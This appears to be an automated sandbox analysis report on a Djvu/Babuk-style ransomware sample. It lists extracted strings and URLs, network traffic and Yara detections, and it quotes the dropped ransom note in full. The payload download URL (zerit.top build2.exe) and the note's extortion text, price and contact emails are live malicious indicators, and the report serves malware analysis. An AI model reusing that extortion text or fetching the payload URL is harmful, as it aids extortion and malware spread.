          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2402793637.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2402993020.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403160510.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403334130.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403535836.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403602939.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.2403720773.00000000032B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zerit.top/dl/build2.exe
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zerit.top/dl/build2.exe$run
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zerit.top/dl/build2.exew
          Source: V0100004.log.12.drString found in binary or memory: https://M365CDN.nel.measure.office-92
          Source: V0100004.log.12.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509191972.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/3c
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000888000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/9c
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/M8
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json$
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json(x86)J
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json.
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000727000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1508299132.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1507924005.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509191972.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json4
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json6R
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json7
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonA
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonHM
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonI
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.00000000008D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonNr?6
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonOfX:
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000003.1355371317.00000000008E1000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000003.1355780671.00000000008E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonP
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonRoB
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonat5
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonesW
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1508299132.0000000000639000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509191972.0000000000639000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000003.1507924005.0000000000639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonj
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonn
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonp2
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001E.00000002.1509084599.00000000005A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonpm
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonrs
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000003.1322050584.00000000008D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsonvr
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.0000000000848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsony
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000019.00000002.1425315982.00000000006D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsony_:
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000001C.00000002.1504817705.0000000000886000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/u8
          Source: V0100004.log.12.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: wctDE6E.tmp.12.drString found in binary or memory: https://dc.services.visualstudio.com/v2/track
          Source: V0100004.log.12.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: V0100004.log.12.drString found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?bd78002c55888096ce060c58
          Source: V0100004.log.12.drString found in binary or memory: https://ecfdb90f321c52ef6e93077f63413543.azr.footprintdns.com/apc/trans.gif?c2fcd52267835a3e34f9ac05
          Source: wctDE6E.tmp.12.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.co
          Source: wctDE6E.tmp.12.drString found in binary or memory: https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.
          Source: HhVfIB.exe, 00000001.00000002.1503916634.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, HhVfIB.exe, 00000001.00000003.1304081456.0000000000E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
          Source: V0100004.log.12.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2519723888.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.000000000090D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-0S984cQ4
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.000000000090D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://we.tl/t-0S984cQ4:p
          Source: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 0000000C.00000002.2515864448.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.0000000000868000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.0000000000902000.00000004.00000020.00020000.00000000.sdmp, DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe, 00000016.00000002.2515534886.000000000091C000.00000004.00000020.00020000.00000000.sdmp, _readme.txt.12.dr, _readme.txt3.12.dr, _readme.txt0.12.drString found in binary or memory: https://we.tl/t-0S984cQ4B3
          Source: V0100004.log.12.drString found in binary or memory: https://www.office.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49702 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49726 version: TLS 1.2
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeCode function: 6_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,6_2_004822E0

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Found ransom note / readme
          Source: C:\_readme.txtDropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.You can get and look video overview decrypt tool:https://we.tl/t-0S984cQ4B3Price of private key and decrypt software is $980.Discount 50% available if you contact us first 72 hours, that's price for you is $490.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@sysmail.chReserve e-mail address to contact us:supportsys@airmail.ccYour personal ID:0430JIjdmi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1Jump to dropped file
          Yara detected Babuk Ransomware
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3804, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7336, type: MEMORYSTR
          Yara detected Djvu Ransomware
          Source: Yara matchFile source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.23115a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21f15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21d15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22a15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.22615a0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe.21c15a0.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.1276888857.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.2512068872.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2512789559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1498593792.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.1495333851.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.1504362031.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.1425109003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1346549601.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1311595784.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.1411953479.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.1508654677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3956, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3712, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 6372, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 2192, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3804, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7336, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7540, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7568, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7728, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7756, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7796, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7820, type: MEMORYSTR
          Yara detected Zorab Ransomware
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 3804, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe PID: 7336, type: MEMORYSTR
          Modifies existing user documents (likely ransomware behavior)
